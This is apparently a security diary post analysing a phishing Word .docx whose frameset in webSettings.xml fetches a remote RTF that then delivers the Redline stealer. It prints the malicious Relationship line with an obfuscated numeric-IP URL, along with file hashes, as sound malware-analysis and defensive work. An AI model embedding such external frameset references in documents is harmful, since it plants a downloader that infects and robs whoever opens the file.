Malicious Word Document with a Frameset

Published: 2022-09-15
Last Updated: 2022-09-15 06:33:30 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

This is definitively new, but I did not see this type of document for a while. I spotted a malicious Word OOXML document (the new ".docx" format) that is a simple downloader. Usually, malicious documents contain an embedded file, a VBA macro, or the recent vulnerability MS-MSDT[1]. This time, the document does not contain any malicious code but just refers to a second stage that will be delivered when the document is opened.

OOXML Microsoft documents support HTML elements such as... framesets! Think about an iframe in an HTML document; we have a similar capability to place text in some places in a document. This feature is not visible by default in Word, but you can enable the feature and create them using Word[2]. Because OOXML documents are ZIP archives, they can be tweaked to implement a frameset and make it point to another payload. 

The document I spotted uses this technique. It was delivered via a phishing campaign and called "Order Confirmation 22839.docx" (SHA256:2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9). In the ZIP archive, let's have a look at the "webSettings.xml" file:

remnux@remnux:/MalwareZoo/20220915$ Order\ Confirmation\ 22839.docx
Index Filename                        Encrypted Timestamp           
    1 [Content_Types].xml                     0 1980-01-01 00:00:00 
    2 _rels/.rels                             0 1980-01-01 00:00:00 
    3 word/_rels/document.xml.rels            0 1980-01-01 00:00:00 
    4 word/document.xml                       0 1980-01-01 00:00:00 
    5 word/theme/theme1.xml                   0 1980-01-01 00:00:00 
    6 word/settings.xml                       0 1980-01-01 00:00:00 
    7 word/fontTable.xml                      0 1980-01-01 00:00:00 
    8 word/_rels/webSettings.xml.rels         0 2022-09-14 11:02:52 
    9 docProps/app.xml                        0 1980-01-01 00:00:00 
   10 word/styles.xml                         0 1980-01-01 00:00:00 
   11 docProps/core.xml                       0 1980-01-01 00:00:00 
   12 word/webSettings.xml                    0 1980-01-01 00:00:00 
remnux@remnux:/MalwareZoo/20220915$ Order\ Confirmation\ 22839.docx -s 12 -d | pretty
<?xml version="1.0" ?>
<w:webSettings xmlns:r="" xmlns:w="">
            <w:w w:val="60"/>
            <w:color w:val="auto"/>
                <w:name w:val="1"/>
                <w:sourceFileName r:id="rId1"/>

We have indeed a frameset that is referenced by id 'rId1'. References are defined in ".rels" files:

remnux@remnux:/MalwareZoo/20220915$ Order\ Confirmation\ 22839.docx -s 8 -d| pretty
<?xml version="1.0" ?>
<Relationships xmlns="">
    <Relationship Id="rId1" Target="http://1806445755/...--------------.....----------------............----------------/....92.doc" TargetMode="External" Type=""/>

Note that the payload will be automatically downloaded with interaction with the user. Just a popup will be displayed:

The payload ("92.doc") is a classic malicious RTF document (SHA256:dd1a1537774ef9680ff376a4baed81c90b11a521ef4c69ffd23edfa59eaa1300). It downloads the real malware from the following URL:


The malware is a Redline stealer[3] (SHA256:7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab) talking to the following C2 server:



Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

0 comment(s)


Diary Archives